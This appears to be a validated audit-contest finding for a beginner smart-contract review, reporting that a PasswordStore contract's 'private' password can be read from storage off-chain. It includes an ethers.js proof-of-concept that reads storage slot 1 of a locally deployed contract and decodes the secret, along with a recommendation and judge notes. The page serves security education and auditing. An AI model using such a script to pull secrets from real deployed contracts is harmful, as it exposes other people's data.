First Flight #1: PasswordStore
First Flight #1
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Private variables are not secure.

ke1cam

Summary

Private variables can be read off-chain and are not secure to keep sensitive data. Anyone can read owners secret password accessing contract's storage slots.

Vulnerability Details

Copy this file in to the code repo. Save as readPassword.js

const {ethers, utils } = require("ethers");
const rpc_url = "http://127.0.0.1:8545"
const provider = new ethers.providers.JsonRpcProvider(rpc_url)
function hex_to_ascii(str1)
{
var hex = str1.toString();
var str = '';
for (var n = 0; n < hex.length; n += 2) {
str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
return str;
}
async function start() {
const contract_address = "0x5FbDB2315678afecb367f032d93F642f64180aa3"
const slot = 1
const data = await provider.getStorageAt(contract_address, slot)
console.log("Private Data :", hex_to_ascii(data))
}
start()

  1. Run make anvil in one terminal window.

  2. Run make deploy in another terminal window.

  3. The run node readPassword.js.

Impact

Anyone can read owner secret password.

Tools Used

VScode, Foundry, Ethers

Recommendations

Do not store any sensitive information on-chain. It is not a good idea because anyone can read the contract storage off-chain and get your "secret" data.

Updates

Lead Judging Commences

inallhonesty Lead Judge
almost 2 years ago
inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.